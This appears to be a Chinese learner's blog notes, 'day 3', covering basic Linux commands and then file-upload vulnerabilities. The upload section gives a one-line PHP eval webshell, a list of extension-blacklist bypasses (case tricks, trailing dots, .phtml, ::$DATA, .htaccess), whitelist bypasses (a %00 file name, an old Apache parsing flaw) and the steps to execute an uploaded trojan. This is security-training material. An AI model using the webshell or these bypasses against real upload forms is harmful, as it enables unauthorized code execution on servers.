这篇博客介绍了Linux基础命令,如ls、cd、pwd、mkdir等,以及文件管理与编辑,如vim和chmod。同时,它关注了文件上传的安全问题,包括黑名单和白名单策略,防止PHP注入等安全威胁。文章提到了文件解析漏洞和如何利用上传的恶意文件执行命令。
day 3
linux简单命令学习:
磁盘管理:
ls 用于显示当前目录下内容
ls -a 显示所有
ls -l 将文件型态、权限、拥有者、文件大小等资讯详细列出
ls -t 文件按时间排序显示
cd 切换目录
cd / 切换到根目录
cd ~切换到home目录
pwd 显示工作目录
文件管理:
mkdir 创建目录
touch 创建文件
cat 显示文件内容
more 显示文件内容
tail 显示文件(文件较大时使用)
vim 编辑文件:
i 进入输入模式
esc 推出输入模式
:w保存 :q推出 :!强制退出
chmod 控制对文件的权限
chmod 777 对所有用户 读 + 写 + 执行
chmod 4 只读
chmod 0 无权限
查缺补漏:Linux命令大全
https://www.runoob.com/linux/linux-command-manual.html
文件上传漏洞
- 黑名单:禁止某些种类的文件进行上传
- 白名单:只允许某些种类的文件上传
黑白名单判别:上传一个随便定义的类型 1.uidsahod
如果拦截,说这种类型的文件不允许上传–>白名单
上传成功–>黑名单
黑名单: .php 一句话木马<?php @eval($_post[1]);?>
- 大小写 Php .phph.php
- 加点加空格 .php空格 .php.
- 解析的一个别名 .php3 .php4 .phtml
- ntfs .php::$DATA
- 配置文件的上传 .htaccess 把jpg解析为php
白名单:
- 命名 1.php%00.jpg
- 解析漏洞 老版apache 1.jpg/.php 自动解析成.php文件
执行命令:
第一:我们能够上传木马文件
第二:我们要能够访问到我们的木马文件
第三:要能够解析我们的恶意文件(图片马)
扫一扫
830
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
